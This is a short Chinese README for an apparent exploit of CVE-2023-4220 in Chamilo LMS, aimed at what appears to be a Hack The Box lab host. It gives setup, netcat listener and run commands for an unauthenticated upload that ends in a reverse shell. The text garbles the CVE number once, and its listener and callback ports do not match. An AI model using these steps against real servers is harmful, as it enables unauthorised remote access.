
针对 Chamilo LMS 中 CVE-2023-4220 的 Python 漏洞利用程序,可上传文件并向 netcat 监听器投递未经身份验证的反向 shell。
pip install requests
该 Python 脚本利用漏洞 CVE-2023-422 将文件上传到服务器,并利用该文件向 netcat 监听器发送反向 shell,而这一切都可以在未经身份验证的情况下完成。不过,你需要按照以下步骤才能成功使用该 Python 脚本。
启动 netcat 监听器:
nc -lnvp 4444
执行 Python 脚本(示例):
python3 main.py -u "http://lms.permx.htb" -p "80" -ni "10.10.16.24" -np "4445"
如果以下漏洞利用对你有帮助,请留下一个 star :)